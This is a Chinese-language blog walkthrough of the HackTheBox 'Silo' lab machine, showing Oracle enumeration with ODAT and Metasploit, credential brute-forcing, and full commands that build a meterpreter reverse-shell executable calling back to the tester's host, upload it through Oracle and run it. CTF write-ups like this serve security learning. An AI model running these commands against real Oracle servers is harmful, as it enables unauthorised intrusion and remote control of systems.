HackTheBox-windows-Silo-Walkthrough

靶机地址：https://www.hackthebox.eu/home/machines/profile/131
靶机难度：中级（5.0/10）
靶机发布日期：2018年8月18日
靶机描述：
Silo focuses mainly on leveraging Oracle to obtain a shell and escalate privileges. It was intended to be completed manually using various tools, however Oracle Database Attack Tool greatly simplifies the process, reducing the difficulty of the machine substantially.
作者：大余
时间：2020-02-18
请注意：对于所有这些计算机，我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

可以看到靶机的IP是10.10.10.82，windows系统的靶机…可以在图中看到real-life值很高，偏向于现实环境…嘿嘿，一台真实的靶机？
官方给的思路：Silo主要利用Oracle获得外壳并提升特权…
今天要对Oracle数据库服务器进行渗透了…

nmap扫描可以看出，开放了很多端口…80：Microsoft IIS httpd 8.5
以及1521oracle的端口开放了oracle-tns服务…直接对这两个渗透…
ODAT：https://github.com/quentinhardy/odat —官方给了ODAT脚本的链接…ODAT是一个开源的代码渗透测试工具，主要用于攻击测试和审计Oracle数据库服务器的安全性…

下载好ODAT后…开始利用odat.py对oracle渗透…（这是个非常好的脚本…对开发和数据库运维人员有很大的帮助检查问题）

需要下载安装ODAT版本才可以运行脚本…
这里安装可以参考https://github.com/quentinhardy/odat下面的内容…
我就不介绍安装步骤了，我这里安装了4次…也算是熟悉了…

经过利用oday扫描发现两个SID：XE、XEXDB

auxiliary/scanner/oracle/sid_brute
另外一种方法是利用MSF内核，发现这个更快就能发现…
现在知道了存在SID，还需要知道凭证才可以登陆…目的是登陆数据库…
这里需要暴力破解…

也可以利用MSF…去爆破…

二、提权

方法1：

方法1我使用了最暴力的方法提权…利用odat.py…

命令：python3 odat.py passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file accounts/dayupasswd.txt
爆破发现用户名密码：scott/tiger （这里我使用自己的密码本是我做过几次了…使用accounts自带的密码本是可以爆破的，就是花了几个小时…所以我就演示方法）

命令：msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.16 lport=6666 -f exe > dayu.exe
生成EXE反向shell文件…

命令：python3 odat.py utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ dayu.exe dayu.exe
使用odat.py上传成功反向shell脚本…

命令：python3 odat.py externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ dayu.exe
可以看到通过odat脚本上传了反向shell后，在通过odat执行了shell，获得反向外壳，成功提权获得root.txt…

方法2：

可以看到此用户允许修改用户密码、创建表格、CVE-2018-3004创建文件、CVE-2012-3137允许使用密匙等等…
可以通过上传文件…或者写shell…或者使用密匙登录获得低权shell…
可以通过smbserver.py创建共享，文件上传…然后数据库里头存在administrator的密码…我就不写出来了，最近有挺多事的…
这里想怎么玩怎么玩，非常非常好的一台数据库靶机…可以学到很多东西…

由于我们已经成功得到root权限查看user.txt和root.txt，因此完成了简单靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。

No.58-HackTheBox-windows-Silo-Walkthrough渗透学习相关推荐

内网渗透学习-Windows信息收集
内网渗透学习-Windows信息收集本章内容主要介绍在获取网站服务器webshell后,怎样对Windows主机进行信息收集,对其网络环境进行分析和利用,主要是一个思路整理,在后续的章节中会整理更详 ...
渗透学习-SQL注入篇-基础知识的学习（持续更新中）
提示:仅供进行学习使用,请勿做出非法的行为.如若由任何违法行为,将依据法律法规进行严惩!!! 文章目录前言一.SQL注入产生的原因二.手工注入大致过程 1.判断注入点: 2.猜解列名 3.猜解能 ...
K8S云原生环境渗透学习
转载至K8S云原生环境渗透学习 - 先知社区 K8S云原生环境渗透学习前言 Kubernetes,简称k8s,是当前主流的容器调度平台,被称为云原生时代的操作系统.在实际项目也经常发 ...
红蓝对抗之Windows内网渗透
无论是渗透测试,还是红蓝对抗,目的都是暴露风险,促进提升安全水平.企业往往在外网布置重兵把守,而内网防护相对来说千疮百孔,所以渗透高手往往通过攻击员工电脑.外网服务.职场WiFi等方式进入内网,然后发 ...
内网渗透-Windows内网渗透
内网渗透-Windows内网渗透文章目录内网渗透-Windows内网渗透前言一.信息收集 1.1.SPN 1.2.端口连接 1.3.配置文件 1.4.用户信息 1.6.会话收集 1.7.凭据收 ...
windows系统-web渗透工具-AWVS
windows系统-web渗透工具-AWVS ACUNETIX WEB VULNERABILITY SCANNER(AWVS) Awvs是一款很出名的web安全扫描器,属于windows系统平台下最流 ...
Web安全渗透学习-环境搭建
Web安全渗透-学习笔记-第一阶段环境准备 OWASP靶机下载 OWASP下载教程 Kali虚拟机安装虚拟机网络环境设置虚拟机无法上网的情况小得环境准备首先我只是一名纯小白,特别纯那种,目 ...
web渗透学习路线图
前言首先,你要高度热爱网络安全这个领域,你要问问自己是否是真的热爱这个行业,自己是否会因为各种了理由半途而废,放弃掉你的热爱.衡量热爱的方法特别特别地简单:看看自己主动花了多少时间在哪些事情方面,重 ...
分享Silverlight/WPF/Windows Phone一周学习导读(10月1日-10月15日)
分享Silverlight/WPF/Windows Phone一周学习导读(10月1日-10月15日) 本周Silverlight学习资源更新: [Silverlight入门系列]ListboxIte ...
分享Silverlight/WPF/Windows Phone一周学习导读(10月30日-11月6日)
分享Silverlight/WPF/Windows Phone一周学习导读(10月30日-11月6日) 本周Silverlight学习资源更新 Silverlight 定位 niejunhua [学习 ...

No.58-HackTheBox-windows-Silo-Walkthrough渗透学习